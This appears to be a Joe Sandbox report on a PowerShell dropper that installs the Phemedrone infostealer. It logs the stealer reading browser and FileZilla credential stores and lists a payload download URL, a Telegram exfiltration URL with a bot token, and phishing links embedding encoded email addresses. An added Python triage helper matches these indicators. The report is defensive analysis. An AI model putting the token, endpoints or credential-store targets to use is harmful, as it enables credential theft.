Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Queries volume information: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: WDSecureUtility_594.exe, 00000003.00000002.1536783632.0000027419362000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

            Stealing of Sensitive Information

Source: Yara match | File source: 00000003.00000002.1535729203.0000027410066000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1535729203.00000274100C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: WDSecureUtility_594.exe PID: 7560, type: MEMORYSTR
Source: Yara match | File source: 00000003.00000002.1535729203.0000027410066000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1534247487.0000027400242000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1535729203.00000274100C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1534247487.0000027400215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1534247487.0000027400254000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: WDSecureUtility_594.exe PID: 7560, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

            Remote Access Functionality

Source: Yara match | File source: 00000003.00000002.1535729203.0000027410066000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1535729203.00000274100C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: WDSecureUtility_594.exe PID: 7560, type: MEMORYSTR
Source: Yara match | File source: 00000003.00000002.1535729203.0000027410066000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1534247487.0000027400242000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1535729203.00000274100C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1534247487.0000027400215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1534247487.0000027400254000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: WDSecureUtility_594.exe PID: 7560, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques matched by this analysis carry the count shown in the report in square brackets; the other entries are the matrix's unmatched placeholder cells)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: [231] Windows Management Instrumentation; [1] PowerShell; At; Cron; Launchd; Scheduled Task
Persistence: [1] DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: [11] Process Injection; [1] DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: [1] Masquerading; [1] Disable or Modify Tools; [251] Virtualization/Sandbox Evasion; [11] Process Injection; [1] Obfuscated Files or Information; [1] DLL Side-Loading
Credential Access: [2] OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: [341] Security Software Discovery; [1] Process Discovery; [251] Virtualization/Sandbox Evasion; [1] Application Window Discovery; [2] File and Directory Discovery; [123] System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: [1] Archive Collected Data; [2] Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: [1] Web Service; [21] Encrypted Channel; [1] Ingress Tool Transfer; [3] Non-Application Layer Protocol; [14] Application Layer Protocol; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Source | Detection | Scanner | Label
upd.ps1 | 3% | ReversingLabs |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | 100% | Joe Sandbox ML |
:newads (copy) | 68% | ReversingLabs | ByteCode-MSIL.Spyware.PhemedroneStealer
C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | 68% | ReversingLabs | ByteCode-MSIL.Spyware.PhemedroneStealer

No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
https://t.me/ | 0% | Avira URL Cloud | safe
https://t.me/freakcodingspot | 0% | Avira URL Cloud | safe
https://api.telegram.org | 0% | Avira URL Cloud | safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
https://t.me/TheDyer | 0% | Avira URL Cloud | safe
https://apitradingview.com | 100% | Avira URL Cloud | malware
https://api.telegram.org/bot8091768794:AAFZsJ1h-6BiszgyLm-eH6c-uITQ7Z99Wbc/sendDocument | 0% | Avira URL Cloud | safe
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot | 0% | Avira URL Cloud | safe
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
https://api.tele | 0% | Avira URL Cloud | safe
https://apitradingview.com/WDSecureUtility.exe | 100% | Avira URL Cloud | malware
https://get.geojs.io | 0% | Avira URL Cloud | safe
https://t.me/webster480 | 0% | Avira URL Cloud | safe
http://apitradingview.com | 100% | Avira URL Cloud | malware
https://get.geojs.io/v1/ip/geo.json | 0% | Avira URL Cloud | safe
http://api.telegram.org | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
get.geojs.io | 172.67.70.233 | true | false | | unknown
api.telegram.org | 149.154.167.220 | true | true | | unknown
apitradingview.com | 86.104.15.60 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot8091768794:AAFZsJ1h-6BiszgyLm-eH6c-uITQ7Z99Wbc/sendDocument | false | Avira URL Cloud: safe | unknown
https://apitradingview.com/WDSecureUtility.exe | false | Avira URL Cloud: malware | unknown
https://get.geojs.io/v1/ip/geo.json | false | Avira URL Cloud: safe | unknown
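The behaviour lines above are the raw material for a triage rule: long Sleep() calls at or above the report's 30000 ms threshold (the values are milliseconds despite the printed "s"; 922337203685477 ms equals .NET TimeSpan.MaxValue), WMI queries against the hardware-fingerprinting classes, reads of browser and FileZilla credential stores, and a Telegram bot token carried in a URL path. The helper below, added here as an example and not part of the Joe Sandbox report or of the sample, folds lines of exactly that shape into a verdict. The sample lines are constructed to mirror the report; the Telegram token in them is a placeholder rather than the observed one, and only the numeric bot id is retained so the secret never lands in a triage record.

```python
"""Triage helper for Joe Sandbox-style behaviour lines (added example, not part of the report)."""
import re
from dataclasses import dataclass, field

# Joe Sandbox flags a sleep of 30 000 ms or more (the ">= -30000s" in the report lines;
# the values are milliseconds despite the printed 's').
LONG_SLEEP_MS = 30_000
# 922337203685477 ms == .NET TimeSpan.MaxValue (Int64.MaxValue ticks / 10 000 ticks per ms):
# effectively "sleep forever", seen in both powershell.exe and the dropped stealer.
INFINITE_SLEEP_MS = 922_337_203_685_477

# WMI classes the dropped binary queries to fingerprint hardware (VM / sandbox check).
VM_WMI_CLASSES = {"Win32_ComputerSystem", "Win32_Processor",
                  "Win32_VideoController", "Win32_DiskDrive"}

# Browser and FileZilla credential stores opened in the "Stealing of Sensitive Information" section.
CRED_STORE_NAMES = {"Login Data", "Web Data", "Cookies", "cookies.sqlite",
                    "key4.db", "sitemanager.xml", "recentservers.xml"}

SLEEP_RE = re.compile(r"Thread sleep time: -(\d+)s >= -(\d+)s")
DELAY_RE = re.compile(r"Thread delayed: delay time: (\d+)")
WMI_RE = re.compile(r"IWbemServices::ExecQuery - (root\\\w+) : SELECT \* FROM (\w+)")
# Tolerates the "Jump to behavior" suffix that the report's export leaves glued to paths.
FILE_RE = re.compile(r"File opened: (.+?)(?:Jump to behavior)?\s*$")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
# Telegram bot tokens are "<numeric bot id>:<secret>" embedded in the API path.
TG_TOKEN_RE = re.compile(r"api\.telegram\.org/bot(\d+):([A-Za-z0-9_-]{20,})")


@dataclass
class Triage:
    long_sleeps_ms: list = field(default_factory=list)
    vm_wmi_classes: set = field(default_factory=set)
    av_enumeration: bool = False            # root\SecurityCenter2 AntivirusProduct query seen
    cred_stores: list = field(default_factory=list)
    telegram_bot_ids: list = field(default_factory=list)   # numeric id only; secret is dropped
    payload_urls: list = field(default_factory=list)

    @property
    def sandbox_evasion(self) -> bool:
        # One very long sleep, or two or more hardware-fingerprint WMI classes, is enough.
        return bool(self.long_sleeps_ms) or len(self.vm_wmi_classes) >= 2

    def verdict(self) -> str:
        if self.cred_stores and self.telegram_bot_ids:
            return "infostealer: credential-store access with Telegram exfiltration channel"
        if self.cred_stores:
            return "suspicious: credential-store access, no exfiltration channel identified"
        return "inconclusive"


def _basename(path: str) -> str:
    return path.replace("/", "\\").rstrip("\\").rsplit("\\", 1)[-1]


def triage(lines) -> Triage:
    """Fold behaviour/URL lines into a Triage record; unrecognised lines are ignored."""
    t = Triage()
    for line in lines:
        if (m := SLEEP_RE.search(line)) or (m := DELAY_RE.search(line)):
            ms = int(m.group(1))
            if ms >= LONG_SLEEP_MS:
                t.long_sleeps_ms.append(ms)
        elif m := WMI_RE.search(line):
            namespace, wmi_class = m.groups()
            if wmi_class in VM_WMI_CLASSES:
                t.vm_wmi_classes.add(wmi_class)
            elif namespace.lower() == "root\\securitycenter2" and wmi_class == "AntivirusProduct":
                t.av_enumeration = True
        elif m := FILE_RE.search(line):
            path = m.group(1).strip()
            if _basename(path) in CRED_STORE_NAMES:
                t.cred_stores.append(path)
        for url in URL_RE.findall(line):          # URLs can appear on any line type
            if tok := TG_TOKEN_RE.search(url):
                if tok.group(1) not in t.telegram_bot_ids:
                    t.telegram_bot_ids.append(tok.group(1))
            elif url.lower().endswith(".exe") and url not in t.payload_urls:
                t.payload_urls.append(url)
    return t


# Constructed sample in the shape of the report; the Telegram token is a placeholder.
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720 Thread sleep time: -600000s >= -30000s",
    r"Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7580 Thread sleep time: -922337203685477s >= -30000s",
    r"Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem",
    r"Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor",
    r"Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct",
    r"Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior",
    r"Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db",
    r"Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini",
    "https://api.telegram.org/bot1234567890:AAPLACEHOLDER_not_the_observed_token_0000/sendDocument",
    "https://apitradingview.com/WDSecureUtility.exe",
]

if __name__ == "__main__":
    result = triage(SAMPLE_LINES)
    print(result.verdict())
    print("sandbox evasion:", result.sandbox_evasion, "long sleeps (ms):", result.long_sleeps_ms)
    print("telegram bot ids:", result.telegram_bot_ids, "payload urls:", result.payload_urls)
```

The evasion score is deliberately separate from the verdict: a single long sleep or a pair of hardware WMI queries is common in benign installers too, so it raises a flag but does not by itself classify the sample, whereas credential-store reads paired with a Telegram bot URL is the combination that makes this a stealer.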
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://t.me/ | WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400001000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtility_594.exe, 00000003.00000002.1534247487.000002740038B000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410066000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.1584441203.000001B1901B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1559813700.000001B181B0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1584441203.000001B19006E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://apitradingview.com | powershell.exe, 00000000.00000002.1559813700.000001B181633000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://duckduckgo.com/ac/?q= | WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://t.me/freakcodingspot | WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400001000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtility_594.exe, 00000003.00000002.1534247487.000002740038B000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410066000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.telegram.org | WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000000.00000002.1559813700.000001B180233000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot | WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000000.00000002.1559813700.000001B180233000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://go.micro | powershell.exe, 00000000.00000002.1559813700.000001B180C33000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://t.me/TheDyer | WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400215000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000000.00000002.1584441203.000001B19006E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000000.00000002.1584441203.000001B19006E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.ecosia.org/newtab/ | WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000000.00000002.1559813700.000001B180233000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://apitradingview.com | powershell.exe, 00000000.00000002.1559813700.000001B18165B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://api.tele | WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000000.00000002.1584441203.000001B19006E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://get.geojs.io | WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400001000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.1584441203.000001B1901B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1584441203.000001B19006E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.1559813700.000001B180001000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://api.telegram.org | WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.1559813700.000001B180001000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400001000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://t.me/webster480 | WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400215000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
86.104.15.60 | apitradingview.com | Netherlands | 44901 | BELCLOUDBG | false
172.67.70.233 | get.geojs.io | United States | 13335 | CLOUDFLARENETUS | false
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1548283
                  Start date and time:2024-11-04 09:41:19 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 3m 49s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:7
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:upd.ps1
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winPS1@4/8@3/3
                  EGA Information:
                  • Successful, ratio: 50%
                  HCA Information:
                  • Successful, ratio: 96%
                  • Number of executed functions: 8
                  • Number of non-executed functions: 1
                  Cookbook Comments:
                  • Found application associated with file extension: .ps1
                  • Stop behavior analysis, all processes terminated
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target powershell.exe, PID 7300 because it is empty
• Not all processes were analyzed, report is missing behavior information
                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: upd.ps1
Time | Type | Description
03:42:16 | API Interceptor | 45x Sleep call for process: powershell.exe modified
03:42:24 | API Interceptor | 18x Sleep call for process: WDSecureUtility_594.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
149.154.167.220 | WDSecureUtil.exe | Get hash | malicious | Phemedrone Stealer | Browse
 | DBp7mBJwqD.exe | Get hash | malicious | Phemedrone Stealer | Browse
 | nuVM6HVKRG.exe | Get hash | malicious | Phemedrone Stealer | Browse
 | pdLBHF2jCE.exe | Get hash | malicious | Phemedrone Stealer | Browse
 | Request for Quotation MK FMHSRFQ241104.vbe | Get hash | malicious | GuLoader, Snake Keylogger | Browse
 | Permintaan Untuk Sebutharga RFQ 087624_Pdf.vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse
 | Permintaan Untuk Sebutharga RFQ 087624.vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse
 | Request for Quotation MK FMHSRFQ241104.vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse
 | Request for Quotation_MYMRT.vbs | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse
 | DOC11042024.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse
86.104.15.60 | Lokalkendskab.exe | Get hash | malicious | GuLoader | Browse
• park-your-track.com/uXIrhGiBMIRv32.bin
 | #U00d6deme makbuzu2.exe | Get hash | malicious | GuLoader | Browse
• park-your-track.com/cQHyYR236.bin
172.67.70.233 | DBp7mBJwqD.exe | Get hash | malicious | Phemedrone Stealer | Browse
 | https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkeyconserv.com%2Fskoda%2FWIA2PParYO43z1bgCVStAX12/ZHVjZXIua2FtZ2FuZ0BjbmVzc3QuZ291di5xYy5jYQ== | Get hash | malicious | Unknown | Browse
 | https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ffilmycurry.in%2Fskoda%2FBxs3IiLfKU2eWewQOro8W1Fa/dGVycmkucm9zYUByYXZlaXMuY29t | Get hash | malicious | Tycoon2FA | Browse
 | https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bg%C2%ADloba%C2%ADlproc%C2%ADessi%C2%ADngne%C2%ADtwo%C2%ADrk.%E2%80%8Bne%C2%ADt%2Ffghd%2Fgfjfjfg%2FlZUdcjNeQOlJngwGts6Dr8m3/Y2hhZC5yYXNtdXNlbkB0aGVybW9zeXN0ZW1zLmNvbQ== | Get hash | malicious | HTMLPhisher, Tycoon2FA | Browse
 | https://www.google.com/url?q=dCSMjVnvsqsqaP8pEWWm&rct=SpPq9HncUaCXUtCZusX0&sa=t&esrc=uZR6jk9A67Rj7RZhLuPE&source=&cd=eh0xIKCKpKh7i4kTt26p&cad=VEVtMkQKVNr1KW4fxShi&ved=NTDACygNXetEDbRT8YiY&uact=%20&url=amp/mithunaads.in/M%2f45043%2FaGFucy5hbmRlcnNvbkBhZy5zdGF0ZS5tbi51cw== | Get hash | malicious | HTMLPhisher, Tycoon2FA | Browse
